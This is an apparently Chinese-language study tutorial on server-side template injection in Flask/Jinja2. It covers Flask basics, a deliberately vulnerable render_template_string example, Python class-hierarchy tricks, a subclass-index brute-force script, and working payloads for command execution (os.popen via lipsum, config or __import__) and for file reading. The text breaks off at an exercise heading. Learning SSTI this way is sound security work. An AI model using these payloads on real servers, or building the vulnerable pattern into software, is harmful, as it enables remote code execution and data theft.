ssti初步

一，简介。

SSTI(Server-Side Template Injection)中文是服务器端模板注入。eg：python中的flask、php的thinkphp、java的spring等框架(MVC），用户输入先进入Controller控制器，然后根据请求类型和请求的指令发送给对应Model业务模型进行业务逻辑判断，数据库存取，最后把结果返回给View视图层，经过模板渲染展示给用户。

二.flask原理基础

1.什么是flask？

一个用python编写的轻量级web应用框架。Flask基于Werkzeug WSGI工具包和Jinja2模板引擎

特点：良好的文档、丰富的插件、包含开发服务器和调试器、集成支持单元测试、RESTful请求调度、支持安全cookies、基于Unicode，python可以用flask直接启动一个web服务页面。

2.flask框架示例（在kali中python的venv中运行）

（1）环境配置

在上述示例中。如果使用相对路径则为物理环境的py，如果是绝对路径就是虚拟环境的py。

Vim编辑器

Vim是一个功能强大的文本编辑器，但相对于nano来说，它的学习曲线较陡峭。不过，一旦掌握了Vim的基本操作，你会发现它非常高效。

• 进入插入模式：在Vim中，默认情况下处于普通模式（Normal Mode），你不能直接输入文本。要进入插入模式（Insert Mode）以编写文本，你可以按i键（表示“insert”）。
• 保存文件：在插入模式下编写完文件后，你需要回到普通模式来保存文件。按Esc键可以退出插入模式，回到普通模式。然后，输入:wq（表示“write and quit”）并按下Enter键来保存文件并退出Vim。如果只想保存文件而不退出Vim，可以输入:w并按下Enter键。

（2） flask框架

1.用vim编辑器在一定路径下按flask框架编辑一个py文件，然后运行，在结尾处可以看到一个地址，在kali中访问它，得到我们kali文件所要得的结果。

注意：此时只能在本机访问，就是虚拟机内，因为给出的地址是本机地址。

2. 基本框架为

3. 可以通过不同的路由来对不同的页面进行访问。

 

4.进行外部访问

通过修改run后面的host为（0.0.0.0）即监听所有的，此时就会监听到我们的物理接口，可以在外部访问。

from flask import Flask

app = Flask(__name__)


@app.route('/')

def   hello():

        return "passion"

@app.route('/')

def   ok():

        return "freedom"


if __name__=='__main__':

        app.run(host='0.0.0.0')

 修改的代码和外部访问

我们运行之后。可以看到出现了一个新的地址

也可以修改端口

3.flask变量规则 

1.通过向规则参数添加变量部分，可以动态构建url。

这里面是类似于传参的过程，用格式化字符串的方式从url将所需传到内容之中。url为：127.0.0.1:5000/hello/动态变量（作为关键字参数传递给与规则相关的函数）

from flask import Flask

app = Flask(__name__)

@app.route('/hello/<name>')   //url提交

def   hello(name):                     //提交后通过这个方法获取内容

        return "hello %s" % name     //将得到的内容放在这里。%s是格式化字符串。%d接受整数，%f接受浮点值

 

if __name__=='__main__':

        app.run(debug=True)

允许添加不同类型的变量

from flask import Flask

app = Flask(__name__)

@app.route('/blog/<int:postID>')        //此处为添加整数型

def   show_blog(postID):                   

        return "Blog Number %d" % postID

@app.route('/rev/<float:revNO>')   //添加浮点数型

def   revision(revNO):                   

        return "Revision Number %f" % revNO

if __name__=='__main__':

        app.run(debug=True)

 整数型实验结果

 浮点数型结果

2. Flask HTTP方法

简介：http协议是万维网中数据通信的基础，该协议中定义了从指定url检索数据的不同方法

GET:以未加密的形式将数据发送到服务器，是最常见的方法。

HEAD：和GET相同，但是没有响应体。

POST:用于将HTML表单数据发送到服务器，post方法接收的数据不由服务器缓存。

PUT:用上传的内容替换目标资源的所有当前表示。

DELETE:删除由URL给出的目标资源的所有当前表示。

 示例：在数据交互的时候，需要用到哪种方式要提前规定好，避免发生错误

 @app.route('/login',methods = ['POST', 'GET'])                                           可以POST提交  
def login():                                                                                                   也可以GET提交    
if request.method == 'POST':. print(1)
user = request.form['ben']
return redirect(url_for('success',name = user))                                               redirect重定向  
else:    print(2)                                                                                                 /success/user    
user = request.args.get('ben')
return redirect(url_for('success',name =user))

4.flask模版介绍

（1）视图函数

主要作用是：生成请求的响应，包括处理业务逻辑和返回响应内容（把业务逻辑和表现内容放在一起，会增加代码的复杂度和维护成本），因此我们使用flask模版。

注::渲染:使用真实值替换变量，再返回最终得到的字符串（flask常用jinja2(模版引擎)来渲染）

 在分开以后

视图函数只负责业务逻辑和数据处理；模版取到视图函数的结果来进行展示。

（2）flask模版函数

• render_template()：加载html文件，默认文件路径在templates目录下。
• render_template_string()：用于渲染字符串，直接定义内容。

5.flask的渲染方法

有render_template和render_template_string两种。

render_template()是用来渲染一个指定的文件的。return render_template(‘index.html’)
render_template_string则是用来渲染一个字符串的。SSTI与这个方法密不可分。

html = '<h1>This is index page</h1>'
return render_template_string(html)

flask是使用Jinja2来作为渲染引擎的。

不正确的使用flask中的render_template_string方法会引发SSTI。

三，模版注入漏洞介绍

（一）.flask漏洞

危害：可能造成任意文件读取和RCE远程控制后台系统
漏洞成因:渲染模板时，没有严格控制对用户的输入;使用了危险的模板，导致用户可以和flask程序进行交互。flask是基于python开发的一种web服务器，那么也就意味着如果用户可以和flask进行交互的话，就可以执行python的代码，比如eval，system，file等等等等之类的函数。

1，{{}}

当内容被{{}}扣起来以后，先进行转义，再被输出，不会执行

from flask import Flask, request, render_template_string

app = Flask(__name__)


@app.route('/', methods=['GET'])
def index():
    string = request.args.get('admin')  # GET获取admin的值赋值给string
    html_str = '''
        <html>
        <head></head>
        <body>{{str}}</body>   
        </html>
    '''
    # str被{{}}包括起来，会被先转义后输出，所以不会被执行

    return render_template_string(html_str, str=string)
    # str通过render_template_string加载到body中间


if __name__ == '__main__':
    app.run(debug=True, host="0.0.0.0")

结果为

 2，{}

{}内的字符串被当场代码执行

from flask import Flask, request, render_template_string

app = Flask(__name__)


@app.route('/', methods=['GET'])
def index():
    string = request.args.get('admin')
    html_str = '''
        <html>
        <head></head>
        <body>{}</body>   
        </html>
    '''.format(string)
    # string的值通过format()函数填充到<body>中间
    # {}可以不填也可以填任意参数

    return render_template_string(html_str)
    # 把{}内的字符串当作代码指令执行


if __name__ == '__main__':
    app.run(debug=True, host="0.0.0.0")

结果为

（二）继承关系

class A: pass

class B(A): pass

class C(B): pass

class D(B): pass

# 创建四个类，B类继承了A类，C、D类继承了B类
c = C()
# 创建一个C的对象c

print(c.__class__)
# 显示当前类C
print(c.__class__.__base__)
# 显示当前类C的父类B
print(c.__class__.__base__.__base__)
# 显示父类B的父类A
print(c.__class__.__base__.__base__.__base__)
# 以此类推
print(c.__class__.__mro__)
# 列出所有父类关系C->B->A->object（数组的形式）
print(c.__class__.__mro__[1].__subclasses__())
# 数组中的第一位是0，显示B类下的所有子类

结果为
<class '__main__.C'>
<class '__main__.B'>
<class '__main__.A'>
<class 'object'>
(<class '__main__.C'>, <class '__main__.B'>, <class '__main__.A'>, <class 'object'>)
[<class '__main__.C'>, <class '__main__.D'>]

漏洞利用为子类通过父类向同父的另一子类进行命令执行

__class__  返回类型所属的对象（当前类）
__mro__    返回一个包含对象所继承的基类元组，方法在解析时按照元组的顺序解析。（从当前类开始排，后面是前面的子类）
__base__   返回该对象所继承的基类（当前类的父类）
// __base__和__mro__都是用来寻找基类的

__subclasses__   每个新类都保留了子类的引用，这个方法返回一个类中仍然可用的的引用的列表（当前类的子类，以数组形式展出）

（三）魔术方法

__class__  返回类型所属的对象，就是当前类
__mro__    返回一个包含对象所继承的基类元组，方法在解析时按照元组的顺序解析。从当前类开始列出，前一个是后一个的子类，一直到object。
__base__   返回该对象所继承的基类，也就是父类

__subclasses__   每个新类都保留了子类的引用，这个方法返回一个类中仍然可用的的引用的列表

当前类的子类（以数组形式列出）

__init__  类的初始化方法，查看类是否重载（程序在运行时就已经加载好了这个模块到内存中如果出现wrapper字眼，就是没有重载），
__globals__  对包含函数全局变量的字典的引用，函数会议字典的形式返回当前对象的全部全局变量。

（四）常用注入模块

 1.文件读取

查找子类_frozen_importlib_external.FileLoader

import requests

url = input('请输入url：')
post = input('请输入参数：')
method = input('请输入要查询的方法：')
for i in range(500):
    data = {post: "{{().__class__.__base__.__subclasses__()[" + str(i) + "]}}"}
    # 依据所需payload转变
    try:
        response = requests.post(url, data=data)
        if response.status_code == 200:
            if method in response.text:
                print(i)
                # print(response.text)
    except:
        pass

搜索需要的方法

__buitins__：对所有内置标识符直接访问

eval()：内置函数，计算字符串表达式的值

popen()：执行一个shell以运行命令

read():让页面回显出内容

2.内建函数eval执行命令

3.os模块执行命令

4.importlib类执行命令

5.linecache函数执行命令

6.subprocess.Popen类命令执行

使用模版的基本判断

（五）类的知识总结

__class__            类的一个内置属性，表示实例对象的类。
__base__             类型对象的直接基类
__bases__            类型对象的全部基类，以元组形式，类型的实例通常没有属性 __bases__
__mro__              此属性是由类组成的元组，在方法解析期间会基于它来查找基类。
__subclasses__()     返回这个类的子类集合，Each class keeps a list of weak references to its immediate subclasses. This method returns a list of all those references still alive. The list is in definition order.
__init__             初始化类，返回的类型是function
__globals__          使用方式是 函数名.__globals__获取function所处空间下可使用的module、方法以及所有变量。
__dic__              类的静态函数、类函数、普通函数、全局变量以及一些内置的属性都是放在类的__dict__里
__getattribute__()   实例、类、函数都具有的__getattribute__魔术方法。事实上，在实例化的对象进行.操作的时候（形如：a.xxx/a.xxx()），都会自动去调用__getattribute__方法。因此我们同样可以直接通过这个方法来获取到实例、类、函数的属性。
__getitem__()        调用字典中的键值，其实就是调用这个魔术方法，比如a['b']，就是a.__getitem__('b')
__builtins__         内建名称空间，内建名称空间有许多名字到对象之间映射，而这些名字其实就是内建函数的名称，对象就是这些内建函数本身。即里面有很多常用的函数。__builtins__与__builtin__的区别就不放了，百度都有。
__import__           动态加载类和函数，也就是导入模块，经常用于导入os模块，__import__('os').popen('ls').read()]
__str__()            返回描写这个对象的字符串，可以理解成就是打印出来。
url_for              flask的一个方法，可以用于得到__builtins__，而且url_for.__globals__['__builtins__']含有current_app。
get_flashed_messages flask的一个方法，可以用于得到__builtins__，而且url_for.__globals__['__builtins__']含有current_app。
lipsum               flask的一个方法，可以用于得到__builtins__，而且lipsum.__globals__含有os模块：{{lipsum.__globals__['os'].popen('ls').read()}}
current_app          应用上下文，一个全局变量。

request              可以用于获取字符串来绕过，包括下面这些，引用一下羽师傅的。此外，同样可以获取open函数:request.__init__.__globals__['__builtins__'].open('/proc\self\fd/3').read()
request.args.x1   	 get传参
request.values.x1 	 所有参数
request.cookies      cookies参数
request.headers      请求头参数
request.form.x1   	 post传参	(Content-Type:applicaation/x-www-form-urlencoded或multipart/form-data)
request.data  		 post传参	(Content-Type:a/b)
request.json		 post传json  (Content-Type: application/json)
config               当前application的所有配置。此外，也可以这样{{ config.__class__.__init__.__globals__['os'].popen('ls').read() }}
g                    {{g}}得到<flask.g of 'flask_ssti'>

 （六）常见过滤器

常用的过滤器

int()：将值转换为int类型；

float()：将值转换为float类型；

lower()：将字符串转换为小写；

upper()：将字符串转换为大写；

title()：把值中的每个单词的首字母都转成大写；

capitalize()：把变量值的首字母转成大写，其余字母转小写；

trim()：截取字符串前面和后面的空白字符；

wordcount()：计算一个长字符串中单词的个数；

reverse()：字符串反转；

replace(value,old,new)： 替换将old替换为new的字符串；

truncate(value,length=255,killwords=False)：截取length长度的字符串；

striptags()：删除字符串中所有的HTML标签，如果出现多个空格，将替换成一个空格；

escape()或e：转义字符，会将<、>等符号转义成HTML中的符号。显例：content|escape或content|e。

safe()： 禁用HTML转义，如果开启了全局转义，那么safe过滤器会将变量关掉转义。示例： {{'<em>hello</em>'|safe}}；

list()：将变量列成列表；

string()：将变量转换成字符串；

join()：将一个序列中的参数值拼接成字符串。示例看上面payload；

abs()：返回一个数值的绝对值；

first()：返回一个序列的第一个元素；

last()：返回一个序列的最后一个元素；

format(value,arags,*kwargs)：格式化字符串。比如：{{ "%s" - "%s"|format('Hello?',"Foo!") }}将输出：Helloo? - Foo!

length()：返回一个序列或者字典的长度；

sum()：返回列表内数值的和；

sort()：返回排序后的列表；

default(value,default_value,boolean=false)：如果当前变量没有值，则会使用参数中的值来代替。示例：name|default('xiaotuo')----如果name不存在，则会使用xiaotuo来替代。boolean=False默认是在只有这个变量为undefined的时候才会使用default中的值，如果想使用python的形式判断是否为false，则可以传递boolean=true。也可以使用or来替换。

length()返回字符串的长度，别名是count

四，函数

1.config:

{{config}}可以获取当前设置，
如果题目类似app.config [‘FLAG’] =（‘FLAG’），那可以直接访问{{config[‘FLAG’]}}或者{{config.FLAG}}得到flag

2.self

{{self.dict._TemplateReference__context.config}} ⇒ 同样可以找到config

（一）继承关系

1.父类和子类：子类可以调用父类下的其他子类。

原因：python flask不能直接执行python指令

object是父子关系的顶端，所有的数据类型最终的父类都是object。

五，例题（ssti-labbs）

leve1